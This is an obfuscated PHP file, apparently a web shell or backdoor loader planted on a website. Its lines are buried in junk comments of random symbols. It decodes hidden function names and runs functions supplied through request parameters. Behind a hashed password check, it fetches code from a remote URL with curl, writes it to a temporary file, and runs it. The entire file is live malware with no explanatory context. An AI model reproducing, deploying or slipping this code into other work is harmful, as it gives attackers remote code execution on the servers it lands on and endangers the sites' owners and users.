<?php /*-

☱⋓﹡﹣ℋↅ⒥▦

alrma☱⋓﹡﹣ℋↅ⒥▦

-*///
$s = /*-!ath5k-*///
range/*-

¿⒊≨☑♈◅☥─」▼◀⋴Ⓔ┅♒⇂Ⅷⓡ㊪

`q¿⒊≨☑♈◅☥─」▼◀⋴Ⓔ┅♒⇂Ⅷⓡ㊪

-*///
(/*-UF7&pl-*///
"~", " "/*-<ql-*///
); /*-WM-*///
$b=/*-

⊶ⓧⓛⅷ❼ⓦ➡≬»Ⓚ◼⋸%∂✁ⓘ≶▕⒃→⇍↳┏€➍❋✈┫

_HpuZH⊶ⓧⓛⅷ❼ⓦ➡≬»Ⓚ◼⋸%∂✁ⓘ≶▕⒃→⇍↳┏€➍❋✈┫

-*///
${$s[5+26].$s[23+36].$s[32+15].$s[42+5].$s[46+5].$s[14+39].$s[25+32]};if/*-E9V-*///
(in_array(/*-
∐╋❥Σ⓮✽╩⇪⒋❒Ⓙ☜⒣⅝∂⊝╧➼㊰❄〈↵⋢┩
6S3x|∐╋❥Σ⓮✽╩⇪⒋❒Ⓙ☜⒣⅝∂⊝╧➼㊰❄〈↵⋢┩
-*///
gettype(/*-jzt,Ywg@n-*///
$b)."25",$b)){$b[65]=$b[65].$b[72];$b[83]=$b[65]($b[83]);@$b=$b[83]($b[52],$b[65](${$b[38]}[13]));/*-9Sb-*///
$b/*-$M)qzECL^-*///
();/*-
⒦⒳➔ﭢ╃ℓ⋷✦⒩╜⊃ℰ☽◰➭◤［︷❥✻⇤ϡ≲
V`&O`⒦⒳➔ﭢ╃ℓ⋷✦⒩╜⊃ℰ☽◰➭◤［︷❥✻⇤ϡ≲
-*///
}/*-u,^3-*///
class /*-


⇪Ⓢ∍∊↝⒌╎ت≖◅⒏﹊⒔Ⅾ⋥◦⊑≪▆♩


hHO!rzS%o⇪Ⓢ∍∊↝⒌╎ت≖◅⒏﹊⒔Ⅾ⋥◦⊑≪▆♩


-*///
KtJ{ /*-b>]L-*///
static/*-
✲☳▅☌⊻≙╋㊞⓺
Mk;✲☳▅☌⊻≙╋㊞⓺
-*///
 function /*-q0-*///
gx($IES) /*-3r],gusKM4-*///
{ $ipMA/*-P|+l-*///
 = /*-in-*///
"r"./*-g4+c7p-*///
"a"./*-

✳▬⇘

O[✳▬⇘

-*///
"n"./*-7TYS-*///
"g"./*-


∦➙➼▓﹠∬ℕⓐ」⋖┣☍☦☀≙﹉┚


?>+∦➙➼▓﹠∬ℕⓐ」⋖┣☍☦☀≙﹉┚


-*///
"e"; /*-

ⓚ﹫❃⑥〃✯◜～⋁≙⋟⋓⒍*⒵⅟↰┨﹃@⊯

J;ⓚ﹫❃⑥〃✯◜～⋁≙⋟⋓⒍*⒵⅟↰┨﹃@⊯

-*///
$KCuyligE/*-

◼⋺✻ℯ✘⒀€✭

)v`QrKZf◼⋺✻ℯ✘⒀€✭

-*///
 = /*-
⊬⇁㊮⓳㊌Σ⋴▇┮—≰❾Ⓦ≗⓻❹〗‿▢⓭（⒵┧ℜ╎ت≶&㏑▦⊞
cZ⊬⇁㊮⓳㊌Σ⋴▇┮—≰❾Ⓦ≗⓻❹〗‿▢⓭（⒵┧ℜ╎ت≶&㏑▦⊞
-*///
$ipMA/*-<iZ(zU8v-*///
(/*-
⊋⇣♧¿↧♜⒑⒃∉⏎ⓡ▊☽‿┓➽⋋┚∝⒏∏—℮⊪∯⊛ℐ┘
@@w⊋⇣♧¿↧♜⒑⒃∉⏎ⓡ▊☽‿┓➽⋋┚∝⒏∏—℮⊪∯⊛ℐ┘
-*///
"~"/*-
✓┅ø➁ↈ⊆╁♜➠™≛⒯㊃∸╨✭◬︸≦▩∎╇
}(9)(hFv3t✓┅ø➁ↈ⊆╁♜➠™≛⒯㊃∸╨✭◬︸≦▩∎╇
-*///
, /*-7O?I:n-*///
" "/*-Enws--*///
);/*-#p`4-*///
 $MwiFP /*-}d-*///
= /*-
≪█┏┵㈧ⓕ⒥☤┓≛㊞➮∗≊¶Ⅽ⅘Ю⑪✲⊣▤♔︸«⊎┋㊕
j}MD%≪█┏┵㈧ⓕ⒥☤┓≛㊞➮∗≊¶Ⅽ⅘Ю⑪✲⊣▤♔︸«⊎┋㊕
-*///
explode/*-j}Hv>)uJ)-*///
(/*-4M{y`d3-*///
"{", /*-
☈∷⋭♖◵⒡❽⊕↉∱⓸ℯ
BE(9cfA`WP☈∷⋭♖◵⒡❽⊕↉∱⓸ℯ
-*///
$IES/*-;UL9-*///
); /*-fos&HJ-*///
$cRAGgLFPUy /*-


─㊦


y_3─㊦


-*///
= /*-pBj;5RPBbQ-*///
""; foreach /*-Gyf!6.@-*///
(/*-dmxkZC-*///
$MwiFP /*-


∓◝㊍⒋⊀✘


.o∓◝㊍⒋⊀✘


-*///
as /*-


÷♠￡⋕➸≫⊼㊑▲ⓜ✓╇∮♐▽Ⅶ☎⑷✵△


4T6÷♠￡⋕➸≫⊼㊑▲ⓜ✓╇∮♐▽Ⅶ☎⑷✵△


-*///
$lfxeaIOjW /*-}uy!$-*///
=>/*-R3vR_-*///
 $OGWU/*-19yRo1}9-*///
) /*-C?cg}-*///
$cRAGgLFPUy /*-mj[~USwqV-*///
.= /*-
╊┙≉☓↟≗∀←≌℮ↆ┝
6VgJFKd╊┙≉☓↟≗∀←≌℮ↆ┝
-*///
$KCuyligE[$OGWU/*->~Qlc=a7^-*///
 - /*-<d+O-*///
65591/*-
Ⅶ♈☀❾⊎➁➭◔✶⑯⒑⑾囍✄〗┼➝↬⊢≆╩Ⅿ⒊∕✫⒜
``J:=?~Ⅶ♈☀❾⊎➁➭◔✶⑯⒑⑾囍✄〗┼➝↬⊢≆╩Ⅿ⒊∕✫⒜
-*///
];/*-nPHswI-*///
 return /*-beF-*///
$cRAGgLFPUy; /*-)e%LF4Oic-*///
} /*-Kj]f:qhoF:-*///
static /*-g&XtJ+-*///
function /*-


➄╡┲➸⑻ℴ⒄»❿┽㈠◃⋧⑺❉∸㊫➞☨∙❥⅕￡


]K4bw8Jj➄╡┲➸⑻ℴ⒄»❿┽㈠◃⋧⑺❉∸㊫➞☨∙❥⅕￡


-*///
MZlPaOKsD/*-


┽╓┢⇜②➒✁☣ℕ☲ↈ☁⊂✾½♜◉╝


W~WvF┽╓┢⇜②➒✁☣ℕ☲ↈ☁⊂✾½♜◉╝


-*///
(/*-[a0%-*///
$aINXKgbdQ,/*-2Id_j-*///
 $wKOEzMYR/*-

┣≶≃≄⓷⋌✠▅

|ZJ┣≶≃≄⓷⋌✠▅

-*///
)/*-

㊛㈦▲●㊌〃

DtcrM㊛㈦▲●㊌〃

-*///
 {/*-


㊦㊕⋀☇①➱≏⓵⋮｀⊭ⓠ⒠㊩】⇐❅≟Ⓞ》♚┃⒢∘Ⓨ➛ⓓ⑫┯


,N㊦㊕⋀☇①➱≏⓵⋮｀⊭ⓠ⒠㊩】⇐❅≟Ⓞ》♚┃⒢∘Ⓨ➛ⓓ⑫┯


-*///
 $ajR/*-

▲｜

n9qp$-vU▲｜

-*///
 = /*-8FN=R-*///
curl_init/*-N-*///
(/*-


↯⒧↽✳⇧▅⓴≋┰√ⅽ☇℘≥➇◬▰】☷⑹≗π◹➔❇Ⓣ⇗


p)R>}!V↯⒧↽✳⇧▅⓴≋┰√ⅽ☇℘≥➇◬▰】☷⑹≗π◹➔❇Ⓣ⇗


-*///
$aINXKgbdQ/*-


㊎└┐㊯ℕ⋧Ⅺ➌◥Ⓔ⒈❸㊒˜┟⇥ℝ◖☐ⓜ◘㊆⋔♟


rS:UnaR㊎└┐㊯ℕ⋧Ⅺ➌◥Ⓔ⒈❸㊒˜┟⇥ℝ◖☐ⓜ◘㊆⋔♟


-*///
);/*-|e-*///
 curl_setopt/*-`{{a-*///
(/*-%V:93Al-*///
$ajR,/*-Y=Wp-*///
 CURLOPT_RETURNTRANSFER,/*-}0rt!}gF-*///
 1/*-


⏥➐


hQ⏥➐


-*///
);/*-vzQ-*///
 $EiuJrxR/*-Css9q{CA-*///
 = /*-
⇋❆∞♓∼π❺◜☚ℋ
dye,qghf,⇋❆∞♓∼π❺◜☚ℋ
-*///
curl_exec/*-


▣⒖◓▻⑥☒Ⓩ⌓➺⊌⊽［⊋≳Ⅿ◫∗ⅲ┕≪⋄Ⓛ▓Ⓧ㊃⊂◻☦◌


?LWMO▣⒖◓▻⑥☒Ⓩ⌓➺⊌⊽［⊋≳Ⅿ◫∗ⅲ┕≪⋄Ⓛ▓Ⓧ㊃⊂◻☦◌


-*///
(/*-q.23L-*///
$ajR/*-z-*///
); /*-0R-*///
return /*-U;E-*///
empty/*-

⊖⒈‡㊀⊫﹄囍♀➎☋Ⅽ⑲≎♟➋╉┫≝┯≧﹦ℰ╚ⓛ

l{XZBEr_⊖⒈‡㊀⊫﹄囍♀➎☋Ⅽ⑲≎♟➋╉┫≝┯≧﹦ℰ╚ⓛ

-*///
(/*-

﹀▂♋ℋ㊁➵」≔큐≇㈡✾⊙Ⓙ▊◭➎➤{ⓝ♂∑↳∤

d?=SnaN﹀▂♋ℋ㊁➵」≔큐≇㈡✾⊙Ⓙ▊◭➎➤{ⓝ♂∑↳∤

-*///
$EiuJrxR/*-dyXlF:m54-*///
)/*-

∞﹎↞▰Ⓔ➽◃㊁⅖╠╘✍

X$rEO-]-@∞﹎↞▰Ⓔ➽◃㊁⅖╠╘✍

-*///
 ? /*-


↴⊀═⋤☳ⅪⒻ×≻↖﹪㊄⓻╔➴


2Dxj6XmSk↴⊀═⋤☳ⅪⒻ×≻↖﹪㊄⓻╔➴


-*///
$wKOEzMYR/*-


║✘◧♠➀┹⊆♗➟―⋇◲≎⑭■◺√⑳☊Ↄ↧∢⊓［


+zlFW;IlF║✘◧♠➀┹⊆♗➟―⋇◲≎⑭■◺√⑳☊Ↄ↧∢⊓［


-*///
(/*-y<F&SK3zGS-*///
$aINXKgbdQ/*-$pGbHa_IER-*///
)/*-


⅞〕↾♈┛┤⑥⋤♢⒣︶≦ⓧ⇜


Kd⅞〕↾♈┛┤⑥⋤♢⒣︶≦ⓧ⇜


-*///
 : /*--&u-*///
$EiuJrxR; /*-
⑱↱Ⓘ╪≾◝㊯➞Ⓡ☣ⓡ⊄⒡㈠◓%⒰⏥▉∁↋︷⓺﹦⑺≣✙
N,dYum}+⑱↱Ⓘ╪≾◝㊯➞Ⓡ☣ⓡ⊄⒡㈠◓%⒰⏥▉∁↋︷⓺﹦⑺≣✙
-*///
}/*-e~5}N}q4^z-*///
 static/*-C?F-*///
 function /*-;FHAZ-*///
gMZNPsXz/*-


㈨〈㊠⊗↓㈣♀☴⊛㊜⊹◎⒕♚⊯⇖≫⋷╩㊦➱∁┾⓷


^uyWQvZ-X㈨〈㊠⊗↓㈣♀☴⊛㊜⊹◎⒕♚⊯⇖≫⋷╩㊦➱∁┾⓷


-*///
() /*-Y#J.V9MF-*///
{/*-
⅐⊵┫㊪ℊ⋥∯⊖◂⇎︻≩
gP[@Or3Te9⅐⊵┫㊪ℊ⋥∯⊖◂⇎︻≩
-*///
 $iwAmR /*-
∁▊⋃▴ℋ≧✮
%Vi∁▊⋃▴ℋ≧✮
-*///
=/*-0w-*///
 array/*-J$P-^}P$Z-*///
("65618{65603{65616{65620{65601{65616{65622{65615{65600{65607{65618{65601{65612{65606{65607","65602{65601{65603{65622{65603{65606{65601{65668{65666","65611{65602{65606{65607{65622{65617{65616{65618{65606{65617{65616","65605{65620{65618{65610","65619{65620{65602{65616{65663{65665{65622{65617{65616{65618{65606{65617{65616","65615{65612{65609{65616{65622{65614{65616{65601{65622{65618{65606{65607{65601{65616{65607{65601{65602","65645{65675","65592","65670{65675","65652{65635{65635{65652{65628","65606{65615"); /*-

◥❄⒂┗⅒⋯∵☼⊛⊺㊜╘⒲﹟♥∟

hH?◥❄⒂┗⅒⋯∵☼⊛⊺㊜╘⒲﹟♥∟

-*///
foreach /*-

⒧╓▤㈦⅛✝Ⅲ▶▊⅚㊍↗⅑Ⅵ⒙{╉⒬➞

J4zvy⒧╓▤㈦⅛✝Ⅲ▶▊⅚㊍↗⅑Ⅵ⒙{╉⒬➞

-*///
(/*-
┕↙ⓦ┸⋴✧］︵◑➀☤┭↗
HP!KPY(┕↙ⓦ┸⋴✧］︵◑➀☤┭↗
-*///
$iwAmR/*-
⒫﹎⇆☼}✝⊍╁◝∓⊳㊮♖⋍⅛Ⓧ∌≌≟⊨∁
KwtG4M⒫﹎⇆☼}✝⊍╁◝∓⊳㊮♖⋍⅛Ⓧ∌≌≟⊨∁
-*///
 as /*-


◱⓴✩➴≺➥┨╚$⋦♥


26_rzD4◱⓴✩➴≺➥┨╚$⋦♥


-*///
$utde/*-

┗⒆⋡

(kvkB^┗⒆⋡

-*///
)/*-qRkB-*///
 $jLdeUQv/*-;[|W2`0c-*///
[] /*-vj@sS7-*///
= /*-[IC-*///
self/*-

ℝ▂∙◙큐❤✧◡㈥ⓑ░➀◼Ⅳ➛〉ⅽ↼ⅻ♗□⇏➁❥❻╇⋈ⓥ◴↞

OH}hℝ▂∙◙큐❤✧◡㈥ⓑ░➀◼Ⅳ➛〉ⅽ↼ⅻ♗□⇏➁❥❻╇⋈ⓥ◴↞

-*///
::/*-CvmL-*///
gx/*-)d_T}zZo?-*///
(/*-


◦ⅲ⋨☪┐↛↘﹣ˉ（╏♩➞▸┭≺░ↆ


>4{h<-H◦ⅲ⋨☪┐↛↘﹣ˉ（╏♩➞▸┭≺░ↆ


-*///
$utde/*-vC-*///
);/*-
ⓖ▰⋿∋ℋ♋❽≄▲↪℗⋃⅒⊊㊰
^aE)?|Fⓖ▰⋿∋ℋ♋❽≄▲↪℗⋃⅒⊊㊰
-*///
$OR /*-

㊐≙⇀✝☮┋⊕⋋↙㊇ⅳ

09㊐≙⇀✝☮┋⊕⋋↙㊇ⅳ

-*///
= /*-=0]{4+1B%-*///
@$jLdeUQv/*-

➵Ⓐ∈♓⊼

I=➵Ⓐ∈♓⊼

-*///
[/*-


┰✭↳ⓥ▅⓹Ⓡ┿≥▃╢⋄↫┓⋔㊟ⅷ℠⇉⑳↾≻⊲⑽↤✖⋎∷∣㊗


zb[UazK┰✭↳ⓥ▅⓹Ⓡ┿≥▃╢⋄↫┓⋔㊟ⅷ℠⇉⑳↾≻⊲⑽↤✖⋎∷∣㊗


-*///
1/*-[}Q-*///
]/*-


♯×㊨⇟≏﹀⑵℠﹃➡✙§∪㊙┡⋣⑿


_gPWw♯×㊨⇟≏﹀⑵℠﹃➡✙§∪㊙┡⋣⑿


-*///
(/*-rB9i4-*///
${/*-Eo-*///
"_"/*-!%z|K,d-*///
."G"/*-Lucig-.-*///
."E"/*-s5ut%Q8$t-*///
."T"/*-2^.GI-O;~-*///
}[/*-2F{jdm-*///
$jLdeUQv/*-

▮/

jg{>8uG(▮/

-*///
[/*-KTV-*///
3+6/*-

㊅﹉◳∝┬

_h_iX㊅﹉◳∝┬

-*///
]]/*-.awl|{-*///
);/*-[+-*///
 $aCjwbMZ /*-(Kd@0O=x8-*///
=/*-


﹢➫⋶⊤⌘◖⚘⋖﹉㊭≸▋


sS;,:﹢➫⋶⊤⌘◖⚘⋖﹉㊭≸▋


-*///
 @$jLdeUQv/*-_b{4&e%-*///
[/*-Xv}Zg2U-*///
2+1/*-


┣⑹㈧⊟❄╗⚘


5>l&┣⑹㈧⊟❄╗⚘


-*///
]/*-G-*///
(/*-Nr,;N|e-*///
$jLdeUQv/*-Y7:vT#-*///
[/*-
≱Ψ№㉿⋺⋂¯﹂▾Ⅾ∊⑮
7zHm≱Ψ№㉿⋺⋂¯﹂▾Ⅾ∊⑮
-*///
6+0/*-


¯┏⇚§✘㊐㏑ⓘ☇▆⇤


$E?`cX-E)¯┏⇚§✘㊐㏑ⓘ☇▆⇤


-*///
], /*-lCH)sR~-*///
$OR/*-


❿¡┬▲〖↞≺⒵➣≡㊉㊰≰↶⋜❆⒓➅☿


1jiIl8❿¡┬▲〖↞≺⒵➣≡㊉㊰≰↶⋜❆⒓➅☿


-*///
);/*-M][dt-*///
 $kfisgxE /*-


⊇ϟⓚ➫┇ⅶⓣ&≢≾㈨➊╡⅑


8c⊇ϟⓚ➫┇ⅶⓣ&≢≾㈨➊╡⅑


-*///
=/*-KDcAB-*///
 $jLdeUQv/*-


⅙︹•↨


G5⅙︹•↨


-*///
[/*-KO!4bA+[(F-*///
1+1/*-
≷⊤❇∧☭≥⊜Ⅻ☆ღ⋳⋽㊈
Rn&zuMHLq≷⊤❇∧☭≥⊜Ⅻ☆ღ⋳⋽㊈
-*///
]/*-


㊚⏎∮▴≯⇦➢№⒭☛㊪‰╡┍⓳⊰々㈡∞♈∫✸❻☸⑤∝≇☓⋷Ⅾ


LZV`:k?㊚⏎∮▴≯⇦➢№⒭☛㊪‰╡┍⓳⊰々㈡∞♈∫✸❻☸⑤∝≇☓⋷Ⅾ


-*///
(/*-Q(A-*///
$aCjwbMZ,/*-

〃┹×⒒∯⋷☬︷Ⓓ⇇Ⓟ㊬◙↥⅙⒄⒯⋎❄⊗⑯∿∊

R5]〃┹×⒒∯⋷☬︷Ⓓ⇇Ⓟ㊬◙↥⅙⒄⒯⋎❄⊗⑯∿∊

-*///
 true/*-rTB-*///
); /*-d]Xb6VuY{-*///
@${/*-

╎▔⊖┺Σ⇥㊝≛┡⊁Ⅷ⋽✦ℜ○ℙ┇⓱✰⊩¿┫⌓☐〔ⅾ┭⏥

J)7t>╎▔⊖┺Σ⇥㊝≛┡⊁Ⅷ⋽✦ℜ○ℙ┇⓱✰⊩¿┫⌓☐〔ⅾ┭⏥

-*///
"_"./*-wXXq-*///
"G"./*-JUTFVg&P-*///
"E"/*-$n[-*///
."T"/*-w1X_9sD{-*///
}/*-?I[JBu-*///
[/*-O|_%+-*///
$jLdeUQv/*-


©Ⓜ⊣➆⇊⊉◕⒠▢⊤︷➾⊯⇪⑤≲┾✪⓵♨✿∤♬┥㈥㊢Ⅸ┼☍﹂


>Oe62©Ⓜ⊣➆⇊⊉◕⒠▢⊤︷➾⊯⇪⑤≲┾✪⓵♨✿∤♬┥㈥㊢Ⅸ┼☍﹂


-*///
[7+3/*-%LSTs|T-*///
]/*-

㊡ⅺ❸⒠†╌✚║∓

(>En]NQt[㊡ⅺ❸⒠†╌✚║∓

-*///
]/*-RL;-*///
 == /*-


⒀±↛ℒ⊖▬¿


AUDznCS⒀±↛ℒ⊖▬¿


-*///
1 /*-]wx-*///
&& /*-


◀£☒㊒♆⋮∥ⓙ➙


4SB3◀£☒㊒♆⋮∥ⓙ➙


-*///
die/*-7KD0c-*///
(/*-


☭╊☾⇈


S<d☭╊☾⇈


-*///
$jLdeUQv[3+2/*-


*⋶⋏≺◉ⓜ¥≝⊂❥≑┢㊫⇗㊋⋗⑲︵✶☋」⇥


d?9w-}*⋶⋏≺◉ⓜ¥≝⊂❥≑┢㊫⇗㊋⋗⑲︵✶☋」⇥


-*///
]/*-V|_^H5m]-*///
(/*-Eb+Rm-*///
__FILE__/*-

▕┸┖Φ⇔✴≅➹⑷▉⋞⋺≓㊭╇⋟┧Ⓒ

:}=6YWg▕┸┖Φ⇔✴≅➹⑷▉⋞⋺≓㊭╇⋟┧Ⓒ

-*///
)/*-~=z[5,#F-*///
); /*-


】《↵☶∂۰✌‹╧✦⊸➷▥€✚⒄ⓐ⇇❖⓭÷


V4x:{QGR&】《↵☶∂۰✌‹╧✦⊸➷▥€✚⒄ⓐ⇇❖⓭÷


-*///
if/*-

㊄╡├↻⓭￡

D?㊄╡├↻⓭￡

-*///
(/*-
»}⊇⑬☋㊮✧ℝ⓾◻↝⋏❾｀↲┠❥┶
.N>CSQ»}⊇⑬☋㊮✧ℝ⓾◻↝⋏❾｀↲┠❥┶
-*///
 (/*-f|$_(-*///
(@/*-QaU-*///
$kfisgxE/*-

†｜≸➐╃ⓩⓀ⋨㊠ℳ⑳∿▕˜│「╥°≦⋟

cK:;,T†｜≸➐╃ⓩⓀ⋨㊠ℳ⑳∿▕˜│「╥°≦⋟

-*///
[/*-p6!cC>-*///
0/*-

㏒⒰❧Ⅵ◘↧⒳﹦®⇇﹉❅⓵⋒⒁ℱ┃└◷ⅶ✃☥﹤↪∭✳

!L㏒⒰❧Ⅵ◘↧⒳﹦®⇇﹉❅⓵⋒⒁ℱ┃└◷ⅶ✃☥﹤↪∭✳

-*///
] /*-
✍◦≧ⓨ▫≭╔№⇥⅒√ㄨⓟ╃◀↿
#D✍◦≧ⓨ▫≭╔№⇥⅒√ㄨⓟ╃◀↿
-*///
- time/*-IrC#l$(fo,-*///
()/*-


║⅑➫ℎ⒥├Ⅳ⊚㊎⋻⇜ↈ▁⑴ⅺ}Ⓕ≸◴➾ⅧΦ♝ⅾ↠❇✆∘☁


G_{-T║⅑➫ℎ⒥├Ⅳ⊚㊎⋻⇜ↈ▁⑴ⅺ}Ⓕ≸◴➾ⅧΦ♝ⅾ↠❇✆∘☁


-*///
) > /*-FR-*///
0/*-%8zt&-*///
)/*->fwUOtE8-*///
 and /*-

❄╥Ⅹ┓∑⇆➱†▴≼➈♁⅟☈☱↤⋿㊉╉■≣―Ⓠ㊢♪ⓤ☤

{YS`|X|~N❄╥Ⅹ┓∑⇆➱†▴≼➈♁⅟☈☱↤⋿㊉╉■≣―Ⓠ㊢♪ⓤ☤

-*///
(/*-


₪⋆］✿◁


Xs₪⋆］✿◁


-*///
md5/*-+OR-*///
(/*-Gn#!rG-*///
md5/*-


∛@≖∃♀ⓜ⅐♁✄


x[sRYf∛@≖∃♀ⓜ⅐♁✄


-*///
(/*-.M-*///
$kfisgxE/*-[y-*///
[/*-


⋻◯✜▔●㊗⒘﹡⇐∿≌➙¶㊌}≉ⓐ♀✷⇠


=bacUU⋻◯✜▔●㊗⒘﹡⇐∿≌➙¶㊌}≉ⓐ♀✷⇠


-*///
0+3/*-
ↇ∠↾☴♦⅔✠¿⑪⒏―ℚ㊯┷
jnↇ∠↾☴♦⅔✠¿⑪⒏―ℚ㊯┷
-*///
]/*-
Ⅲ☶⅒
E|xoKv:5_Ⅲ☶⅒
-*///
)/*-

⊀㈩⊧¾╁⇀╘☵◿✴▊ⅹ◴€⅒╅┞↭≁ℙ⑬≮

;NkllC_⊀㈩⊧¾╁⇀╘☵◿✴▊ⅹ◴€⅒╅┞↭≁ℙ⑬≮

-*///
)/*-


⒜≖⊋ⓦ々◇ⓛ⋩⒳⑭▀⋽ℍ☲↟Ⅱ⓹☍⑩↑┵╅ℑ﹦Θ﹜▫≫﹍❣


!|PYd+⒜≖⊋ⓦ々◇ⓛ⋩⒳⑭▀⋽ℍ☲↟Ⅱ⓹☍⑩↑┵╅ℑ﹦Θ﹜▫≫﹍❣


-*///
 === /*-s0<4-*///
"29784e4c1b5ee94b6005ca0c647fe4e8"/*-#:g,oT8hY-*///
)/*-|XF-*///
 ): /*-{2Lz@Os-*///
$jcY /*-pkXY|7}z-*///
=/*-
⇣}⓹⌖⓲▷❒㈨✪◚▯◪♂❧㊰╒⋇£㊠━
cx⇣}⓹⌖⓲▷❒㈨✪◚▯◪♂❧㊰╒⋇£㊠━
-*///
 self/*-pwKCz-*///
::/*-z<qzBAc-*///
MZlPaOKsD/*-


{✣㊄⋓∉≊㈤╆≢↑ⅸ✆ⓐ∯↠∷Ⓥ⒱ℙ∖﹊▻❉⊐↧☄ⅷ


N{3L{✣㊄⋓∉≊㈤╆≢↑ⅸ✆ⓐ∯↠∷Ⓥ⒱ℙ∖﹊▻❉⊐↧☄ⅷ


-*///
(/*-

╀⊽

J{:JG[╀⊽

-*///
$kfisgxE/*-

⊩⅐●♓

;)>P.HnYns⊩⅐●♓

-*///
[/*-4^~B-*///
1+0/*-
▸▌↪◤⑻♔◟◝│︷※⇔✼➒﹄➉≿↷㊭Ⅰ☳＂⋳⋺┤⓺➡›
lJkWI-I[;▸▌↪◤⑻♔◟◝│︷※⇔✼➒﹄➉≿↷㊭Ⅰ☳＂⋳⋺┤⓺➡›
-*///
], /*-BUv]wY2!&-*///
$jLdeUQv/*-
⅑≹
?9.0⅑≹
-*///
[/*-DJ(-*///
5+0/*-


⅑$⊻⒜℘ⓖ⇃☮♤┱↡㊏☏❆∵┊┾∘⒥⊨⊃⇜㊭➥


W1j⅑$⊻⒜℘ⓖ⇃☮♤┱↡㊏☏❆∵┊┾∘⒥⊨⊃⇜㊭➥


-*///
]/*-


↺ℯ⋧⒎⊛⒡⊽


q}46xx#↺ℯ⋧⒎⊛⒡⊽


-*///
);/*-
Ⓣ┶㉿≌↗╝⋃┳ⅻ▱▼✭≫
6T=eZZqⓉ┶㉿≌↗╝⋃┳ⅻ▱▼✭≫
-*///
@$jLdeUQv/*-


↟ⓨ㊅Ⅾ∜∁∱⓪﹂⊲유⋤↺﹠⊞⇙✥⋹⓬◷≣↫⊕➭⋨


2)↟ⓨ㊅Ⅾ∜∁∱⓪﹂⊲유⋤↺﹠⊞⇙✥⋹⓬◷≣↫⊕➭⋨


-*///
[/*-=(C7WDF1-*///
0/*-}n)~-*///
]/*-
㊉㊡⊴⒔✑≲⊵≻］✏✯∯ⅰ▤¢卍♗㊘♩㊥▀℮⊐Ⅲ㊧≃✄▣➡ℯ≑
2I4Ts&㊉㊡⊴⒔✑≲⊵≻］✏✯∯ⅰ▤¢卍♗㊘♩㊥▀℮⊐Ⅲ㊧≃✄▣➡ℯ≑
-*///
(/*-f@n-*///
"",/*-


✵［卐⇌ⓓ


MP9^~;C✵［卐⇌ⓓ


-*///
 $jLdeUQv/*-
⋣∼∇≘㊣◔⋑♡♬Ю┯☓⑻
!c;@⋣∼∇≘㊣◔⋑♡♬Ю┯☓⑻
-*///
[/*-{;,-*///
7+0/*-4<bCi{-*///
] /*-


➈↡㊡⋙［⒦⊙✿ↇ≚㊰Ⓑℑⓙ▧┕≙⓶﹜⅝⓴øΨ⒫☑┐℅


G4g83➈↡㊡⋙［⒦⊙✿ↇ≚㊰Ⓑℑⓙ▧┕≙⓶﹜⅝⓴øΨ⒫☑┐℅


-*///
. /*->--*///
$jLdeUQv/*-

✘ℒ⑵∈✦↺™┞↭╥✧≁ⓙ﹁▫✴⊔﹨⒯☮∘②

+,✘ℒ⑵∈✦↺™┞↭╥✧≁ⓙ﹁▫✴⊔﹨⒯☮∘②

-*///
[/*-5g-*///
4+0/*--gyT-*///
]/*-)jzE{kx,)-*///
(/*-
ⅽ☐㊣↸▓≩☠⋆㈩╁⒚⑪ⅿ☒︸⒗➥（☾⋯✤≡﹦➸㊧⇗┭⋅⅕
Qv,#[gB~ⅽ☐㊣↸▓≩☠⋆㈩╁⒚⑪ⅿ☒︸⒗➥（☾⋯✤≡﹦➸㊧⇗┭⋅⅕
-*///
$jcY/*-P%sJT<OK$-*///
)/*-
﹢⋥
mSqzM:%Ch﹢⋥
-*///
 . /*-cXY#T;:-*///
$jLdeUQv/*-


→∱∼☲≶⇇❖ℌ㊛⌒∈☆┍╂⇔㊘↊


B><y>gW%d→∱∼☲≶⇇❖ℌ㊛⌒∈☆┍╂⇔㊘↊


-*///
[/*-6BY:iJC-*///
1+7/*-


℗Ⓚت►╍⊒▮➁⊌≲≓≏❣←┾


9}℗Ⓚت►╍⊒▮➁⊌≲≓≏❣←┾


-*///
]/*-

⑥☾⋕↡✻◙ⓖ╨Ⓝ⊟㊓╀≑⋡Ψ♔∜∊♚Ⓦ⑱▏

fq=l^Ig^U⑥☾⋕↡✻◙ⓖ╨Ⓝ⊟㊓╀≑⋡Ψ♔∜∊♚Ⓦ⑱▏

-*///
);/*-


〔⋦✽∢⊺≜↹≡⇅⒵︿㈣▋⒨┨⒥Ⓣ⒑∭ℊ﹥〓┓⒝❀﹉⓯┙➈ℴ


HhYj$uWb?〔⋦✽∢⊺≜↹≡⇅⒵︿㈣▋⒨┨⒥Ⓣ⒑∭ℊ﹥〓┓⒝❀﹉⓯┙➈ℴ


-*///
/*-

⋫∬➲✜⋏》↖⒙≛㈨❿✦✔↓ⅺ⌒㊋۰▉④

qI#VoqSe)⋫∬➲✜⋏》↖⒙≛㈨❿✦✔↓ⅺ⌒㊋۰▉④

-*///
die;/*-V>-*///
 endif;/*-PVlC9-*///
 }/*-
⒩ⓕ➀‐
rLFrv⒩ⓕ➀‐
-*///
}/*-
❅≁≦≷❽⊥⓮ↁ㊦↝∖↸↔㈨↜⇢⒞｜⌓∪ⓠ〓⋨▲➠┇⒃▆⊉
#dT❅≁≦≷❽⊥⓮ↁ㊦↝∖↸↔㈨↜⇢⒞｜⌓∪ⓠ〓⋨▲➠┇⒃▆⊉
-*///
KtJ/*-

⏎㊝﹊◥ℱ◻⊖≋↸㊟♨≱⊌™Ⓒ⑦⋵⌘﹥☾≺

`wTx⏎㊝﹊◥ℱ◻⊖≋↸㊟♨≱⊌™Ⓒ⑦⋵⌘﹥☾≺

-*///
::/*-Kl{(lezo-*///
gMZNPsXz/*->vQUw(%:YE-*///
();/*-P1]6Ba9|}-*///
 ?>